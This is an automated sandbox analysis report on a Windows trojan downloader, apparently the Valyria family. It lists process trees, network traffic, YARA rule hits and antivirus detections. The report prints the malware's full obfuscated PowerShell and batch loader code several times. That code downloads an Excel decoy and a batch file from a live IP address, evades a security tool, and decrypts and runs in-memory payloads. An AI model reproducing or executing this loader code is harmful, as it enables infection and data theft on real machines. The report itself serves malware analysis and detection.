Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | May 9, 2024, 10:59 a.m. | May 9, 2024, 11:05 a.m. |
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function lCfBYm($CxbstDZ, $hOVfNeFjMDKVb){[IO.File]::WriteAllBytes($CxbstDZ, $hOVfNeFjMDKVb)};function tegHetozGCLG($CxbstDZ){if($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46011,46019,46019))) -eq $True){rundll32.exe $CxbstDZ }elseif($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46023,46026,45960))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CxbstDZ}elseif($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46020,46026,46016))) -eq $True){misexec /qn /i $CxbstDZ}else{Start-Process $CxbstDZ}};function HVPZyUfwsXQUN($AOabLJYpXH){$zAoQSxGInPhmTj = New-Object (YHxkLPuDenWtsw @(45989,46012,46027,45957,45998,46012,46009,45978,46019,46016,46012,46021,46027));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hOVfNeFjMDKVb = $zAoQSxGInPhmTj.DownloadData($AOabLJYpXH);return $hOVfNeFjMDKVb};function YHxkLPuDenWtsw($gDqabOaTrBupDM){$LjTGjOQYKEN=45911;$zmPdEgNuruHTyO=$Null;foreach($IgfJnWcttwE in $gDqabOaTrBupDM){$zmPdEgNuruHTyO+=[char]($IgfJnWcttwE-$LjTGjOQYKEN)};return $zmPdEgNuruHTyO};function vbCETHtlMccKpmVgu(){$MREPVsahkPX = $env:AppData + '\';$alhWjToureJPvdZsBUe = $MREPVsahkPX + '11.xlsx';If(Test-Path -Path $alhWjToureJPvdZsBUe){Invoke-Item $alhWjToureJPvdZsBUe;}Else{ $GuMutFsCYQ = HVPZyUfwsXQUN (YHxkLPuDenWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45968,45962,45957,45961,45961,45961,45957,45968,45965,45957,45960,45961,45963,45969,45966,45961,45967,45966,45958,45960,45960,45957,46031,46019,46026,46031));lCfBYm $alhWjToureJPvdZsBUe $GuMutFsCYQ;Invoke-Item $alhWjToureJPvdZsBUe;};$hAnIYx = $MREPVsahkPX + 'xD.bat'; if (Test-Path -Path $hAnIYx){tegHetozGCLG $hAnIYx;}Else{ $KeXJYIz = HVPZyUfwsXQUN (YHxkLPuDenWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45968,45962,45957,45961,45961,45961,45957,45968,45965,45957,45960,45961,45963,45969,45966,45961,45967,45966,45958,46031,45979,45957,46009,46008,46027));lCfBYm $hAnIYx $KeXJYIz;tegHetozGCLG $hAnIYx;};;;;}vbCETHtlMccKpmVgu;
2656-
EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
2816 -
-
-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); "
2116 -
powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2068
-
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1452
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
193.222.96.124 | Active | Moloch |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 193.222.96.124:7287 -> 192.168.56.101:49163 | 2400036 | ET DROP Spamhaus DROP Listed Traffic Inbound group 37 | Misc Attack |
TCP 192.168.56.101:49163 -> 193.222.96.124:7287 | 2027254 | ET INFO Dotted Quad Host XLSX Request | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\12.0\Registration\{90120000-0030-0000-0000-0000000FF1CE}\DigitalProductID |
file | C:\Users\test22\AppData\Roaming\11.xlsx |
file | C:\Users\test22\AppData\Roaming\~$11.xlsx |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\11.xlsx.LNK |
file | C:\Users\test22\AppData\Roaming\xD.bat |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Roaming.LNK |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\11.xlsx.LNK |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Roaming.LNK |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); " |
cmdline | C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\xD.bat" |
cmdline | powershell.exe -ExecutionPolicy UnRestricted function lCfBYm($CxbstDZ, $hOVfNeFjMDKVb){[IO.File]::WriteAllBytes($CxbstDZ, $hOVfNeFjMDKVb)};function tegHetozGCLG($CxbstDZ){if($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46011,46019,46019))) -eq $True){rundll32.exe $CxbstDZ }elseif($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46023,46026,45960))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CxbstDZ}elseif($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46020,46026,46016))) -eq $True){misexec /qn /i $CxbstDZ}else{Start-Process $CxbstDZ}};function HVPZyUfwsXQUN($AOabLJYpXH){$zAoQSxGInPhmTj = New-Object (YHxkLPuDenWtsw @(45989,46012,46027,45957,45998,46012,46009,45978,46019,46016,46012,46021,46027));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hOVfNeFjMDKVb = $zAoQSxGInPhmTj.DownloadData($AOabLJYpXH);return $hOVfNeFjMDKVb};function YHxkLPuDenWtsw($gDqabOaTrBupDM){$LjTGjOQYKEN=45911;$zmPdEgNuruHTyO=$Null;foreach($IgfJnWcttwE in $gDqabOaTrBupDM){$zmPdEgNuruHTyO+=[char]($IgfJnWcttwE-$LjTGjOQYKEN)};return $zmPdEgNuruHTyO};function vbCETHtlMccKpmVgu(){$MREPVsahkPX = $env:AppData + '\';$alhWjToureJPvdZsBUe = $MREPVsahkPX + '11.xlsx';If(Test-Path -Path $alhWjToureJPvdZsBUe){Invoke-Item $alhWjToureJPvdZsBUe;}Else{ $GuMutFsCYQ = HVPZyUfwsXQUN (YHxkLPuDenWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45968,45962,45957,45961,45961,45961,45957,45968,45965,45957,45960,45961,45963,45969,45966,45961,45967,45966,45958,45960,45960,45957,46031,46019,46026,46031));lCfBYm $alhWjToureJPvdZsBUe $GuMutFsCYQ;Invoke-Item $alhWjToureJPvdZsBUe;};$hAnIYx = $MREPVsahkPX + 'xD.bat'; if (Test-Path -Path $hAnIYx){tegHetozGCLG $hAnIYx;}Else{ $KeXJYIz = HVPZyUfwsXQUN (YHxkLPuDenWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45968,45962,45957,45961,45961,45961,45957,45968,45965,45957,45960,45961,45963,45969,45966,45961,45967,45966,45958,46031,45979,45957,46009,46008,46027));lCfBYm $hAnIYx $KeXJYIz;tegHetozGCLG $hAnIYx;};;;;}vbCETHtlMccKpmVgu; |
cmdline | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function lCfBYm($CxbstDZ, $hOVfNeFjMDKVb){[IO.File]::WriteAllBytes($CxbstDZ, $hOVfNeFjMDKVb)};function tegHetozGCLG($CxbstDZ){if($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46011,46019,46019))) -eq $True){rundll32.exe $CxbstDZ }elseif($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46023,46026,45960))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CxbstDZ}elseif($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46020,46026,46016))) -eq $True){misexec /qn /i $CxbstDZ}else{Start-Process $CxbstDZ}};function HVPZyUfwsXQUN($AOabLJYpXH){$zAoQSxGInPhmTj = New-Object (YHxkLPuDenWtsw @(45989,46012,46027,45957,45998,46012,46009,45978,46019,46016,46012,46021,46027));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hOVfNeFjMDKVb = $zAoQSxGInPhmTj.DownloadData($AOabLJYpXH);return $hOVfNeFjMDKVb};function YHxkLPuDenWtsw($gDqabOaTrBupDM){$LjTGjOQYKEN=45911;$zmPdEgNuruHTyO=$Null;foreach($IgfJnWcttwE in $gDqabOaTrBupDM){$zmPdEgNuruHTyO+=[char]($IgfJnWcttwE-$LjTGjOQYKEN)};return $zmPdEgNuruHTyO};function vbCETHtlMccKpmVgu(){$MREPVsahkPX = $env:AppData + '\';$alhWjToureJPvdZsBUe = $MREPVsahkPX + '11.xlsx';If(Test-Path -Path $alhWjToureJPvdZsBUe){Invoke-Item $alhWjToureJPvdZsBUe;}Else{ $GuMutFsCYQ = HVPZyUfwsXQUN (YHxkLPuDenWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45968,45962,45957,45961,45961,45961,45957,45968,45965,45957,45960,45961,45963,45969,45966,45961,45967,45966,45958,45960,45960,45957,46031,46019,46026,46031));lCfBYm $alhWjToureJPvdZsBUe $GuMutFsCYQ;Invoke-Item $alhWjToureJPvdZsBUe;};$hAnIYx = $MREPVsahkPX + 'xD.bat'; if (Test-Path -Path $hAnIYx){tegHetozGCLG $hAnIYx;}Else{ $KeXJYIz = HVPZyUfwsXQUN (YHxkLPuDenWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45968,45962,45957,45961,45961,45961,45957,45968,45965,45957,45960,45961,45963,45969,45966,45961,45967,45966,45958,46031,45979,45957,46009,46008,46027));lCfBYm $hAnIYx $KeXJYIz;tegHetozGCLG $hAnIYx;};;;;}vbCETHtlMccKpmVgu; |
Data received | HTTP/1.1 200 OK |
Data received | Content-Length: 18710 Content-Type: application/octet-stream Connection:close PK ! bîh^ [Content_Types].xml ¢( ¬ËNÃ0E÷HüCä-Jܲ@5íÇ*Q>ÀÄƪc[iiÿûB¡j7±ÏÜ{2ñÍh²nm¶Æ»RÈÀU^7/ÅÇì%¿rZYï @1__f q·ÃR4DáAJ¬h>ãÚÇVßƹªZ¨9ÈÛÁàNVÞ8Ê©ÓãÑÔji){^óã-I"{Üv^¥P!XS)bR¹rúK¾s(¸3Õ`cÞ0½ÝÎß»¾7M4²©ôªZÆk+¿|\|z¿(ôPúº6h_-[@!ÒØ Pk´2nÏ}Ä?£LËð Ýû%áÄßdºdN"m,à¥ÇDO97*~§Èɸ8ÀOíc|n¦ÑäEøÿöéºóÀBÉÀ!$}íàÈé;{ìÐå[îñé2þ ÿÿ PK ! µU0#ô L _rels/.rels ¢( ¬MOÃ0ïHüÈ÷ÕÝBKwAH»!T~Iܵ£$Ý¿'TG½~üÊÛÝ<êÈ!öâ4¬;#¶wúqu*&rFq¬áÄvÕõÕöGJy(v½*«¸¨¡KÉß#FÓñD±Ï.W ¥=ZÆMYÞbø®ÕBSí°·7 êÏצé ?9LìÒÈsbgÙ®|Èl!õùUSh9i°br:"y_dlÀóD¿ý|-NÈR"4ø2ÏGÇ% õZ´4ñËyÄ7 ëÈðÉ¨Þ ÿÿ PK ! Ò§¬Úú Ò xl/workbook.xml¬UÛn£0}_iÿùb Tm¥îªêõ%ÒʧXÌÚ¦IUõßwLJ¯/Ýv#âÛã33ÇÃáÑ®®¬[&MÈFkrQðæ&F{,¥iSÐJ4,FwL¡£é÷o[!7+!6 4*F¥Ömä8*/YMÕhYµ5Õ07j%£ *Óuå¸NMyöüX¯yÎ2w5kôD²j ¯JÞªÎ?WS¹éZ;u+^q}×"«Î£ãFHºªÀíñ'?ÁиÃI`zwTÍs)Xëvö¤ßùO°CÈ«ìÞÇàcH#Ù-79|b%O² °g0¿F@Z½V |
Data received | Content-Length: 66709 Content-Type: application/octet-stream Connection:close @echo off set "XYwABq=setocjVd ocjVduocjVdnSiocjVd=1 ocjVd&ocjVd& ocjVdstocjVdarocjVdt "ocjVd"ocjVd /mocjVdinocjVd ocjVd" set "aHbyse=&& ocjVdeocjVdxiocjVdtocjVd" set "YnfQeG=noocjVdtocjVd deocjVdfiocjVdnocjVdedocjVd uocjVdnSocjVdiocjVd if %YnfQeG:ocjVd=% (%XYwABq:ocjVd=%%0 %aHbyse:ocjVd=%) ::BeF5ow87uxWaOVsDX34hfHMzjY9LyYGJF8taUicqnOUHe1k+/C8bjfy7DRK1pgkPdtgP565bb9l1s/5bJA7EJV5U6XEOWyzY6nThjd5rAl67iErFaOrBOKOOvdUPLJj8yPws2zLhtzEujD588yBkMTMx9HC7KYAklXvPVSNdG4Ol54BuJusY/AB0kfUsR+J3koGkeRUT1m/s1AGQOaLusuZeFaFfqfOgHpgq7TWGba/B0JufgZ8a03iTDlDWnrdqh2GKb57hz7eEfEly+VXCXMdddlc9J45dLdABoTiyQ7tfKj+LXWZC52OxM+5SHVic+xXDN5nAoZvbK/WoU7y7u8SoviIS/X96YgW7R51EmhMNDPybjPit63dj4eQKo7jvhETMkWsBhp2sx6y5PKShUekyFY3WrjwAYffrkA1ZKo4qhj9rOXtHrlTCj7j+iU4uG3zFw44eGfmGvCOqUOe+iJYfFfouIEKHMg1ixaf87l4kXIlLMjjXoNn/0XJ/Tvt/eC77/MjMi9SAUg9Uvch+74mglxEvZU9GiucPSPzDflPSEhSVYj+OjkUob54YgRgL8HhhRHRlikAAyyPxSeJ18Md/asnK53hPVc49qolIY83tG3Fa2wXtEDSIitt8RQF2lWZj9HImAs0tVqmA9z+qMnbKbXy3WpYrVALWMakVYEiW7OwjVuO0Kqb7nqAtFR1MZfgeSVRWKzD5beSDoeJNUhVzs1eGAdJljUSuQnuWucaWBd9uoJcaLnGgfV0X4N9WQPwYjGd4naPDIIBYVcBweC0CoK10uOtSFiJzSqbEISWOAualyz/A6eGRHKkxaKl5F83Kp+Qillri9trdzPAGb/1ZNd54J4hbx7QR7tsfmN90wm+BevEvIzZkbF9ipwoMjAU0/BuB4PbSNely5xw5HFyyacehUXMDrtUAbDDjiwobB6dXeIO+eq1Rm6GfDNrjPcBRjphgjtQ2Qsvs1VG/3BDMIYSV4/H74I9rnWNkqo6QwwUh8bHzllBe4jhdKjthpI/OVi56Z8shqld6zR5Wt4eOYbm5I5DgS9IpwixY1Br1hQ4gyTRaYz6HDm1eo4sltb+EE9RGy2N/FfPPL7ysZD806HIwu7+uUkUUpZ5tJwAff1jVoGtkODQVN+QILsb3juCRaDB+TFoEHsJnEU8ITH19TURHoVvTOjLLn5xOhcU2etBUHlsHZ2klEydvXgRWL8yON4Oqz1CQdT+HirAYGaXn5fnWgNU09dXarADPEUOxcDVIuGWMg2p0/wgf+ANkBwdr0gCLjdlYUDpIUagoSl1jhs7FadaSS3QCJlPh4CDOePaN2gRMGEIUg3JBLnQcwSDfof61zglFwhS9jTs0fkiYuFDFEjL0dgCWNGNQG1yKdGXEEJ61RU3kqgiliOx6WjzbDggnVhbn+R4d0uExP990QRPusO5LR6Ev8aCyBSA/MjCuNayqaI843sPM52AEfQcDpmW3mlIO1A4ntSRwqL3sV7GRvd7DocYOUqDSxan9neGhuCtgrMuOus2VoqvRU7d0xyfqo5bs4SIW7qksuPW5DgQUJXm1bRTmn/kHDzJ0/4hWYV28Skzo8qT4wQcayI7I9iGl0jjYFrGiCgPQdMZx23/0Sesm4HQSpaIGOlUKBzR0/uP3jrPu0JlxkEZDairsQxmeFmpFOMx5j/vrwNgrL74iaFGGkynwqD2M2ivdpiR7Z8BgoKz8trnfXTo3H1IUB9KfnHjxFVN2CFHq/ |
Data sent | GET /11.xlsx HTTP/1.1 Host: 193.222.96.124:7287 Connection: Keep-Alive |
Data sent | GET /xD.bat HTTP/1.1 Host: 193.222.96.124:7287 |
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win |
host | 193.222.96.124 |
file | C:\Users\test22\AppData\Roaming\11.xlsx |
file | C:\Users\test22\AppData\Roaming\xD.bat |
cve | CVE-2013-3906 |
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\11.xlsx | ||||||
parent_process | powershell.exe | martian_process | "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e | ||||||
parent_process | powershell.exe | martian_process | "C:\Users\test22\AppData\Roaming\xD.bat" | ||||||
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\xD.bat |
option | -w hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
Cynet | Malicious (score: 99) |
Skyhigh | HTA/Downloader.f |
ALYac | VB:Trojan.Valyria.7482 |
VIPRE | VB:Trojan.Valyria.7482 |
Arcabit | VB:Trojan.Valyria.D1D3A |
ESET-NOD32 | VBS/Agent.QVR |
McAfee | HTA/Downloader.f |
Avast | Script:SNH-gen [Drp] |
Kaspersky | HEUR:Trojan-Downloader.Script.Generic |
BitDefender | VB:Trojan.Valyria.7482 |
NANO-Antivirus | Trojan.Script.Downloader.jpdglv |
MicroWorld-eScan | VB:Trojan.Valyria.7482 |
Rising | Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI) |
Emsisoft | VB:Trojan.Valyria.7482 (B) |
F-Secure | Malware.VBS/Dldr.Agent.VPLT |
FireEye | VB:Trojan.Valyria.7482 |
Ikarus | Trojan.VBS.Agent |
Detected | |
Avira | VBS/Dldr.Agent.VPLT |
GData | VB:Trojan.Valyria.7482 |
Varist | VBS/Agent.AZC!Eldorado |
MAX | malware (ai score=82) |
Fortinet | VBS/Agent.BSD!tr |
AVG | Script:SNH-gen [Drp] |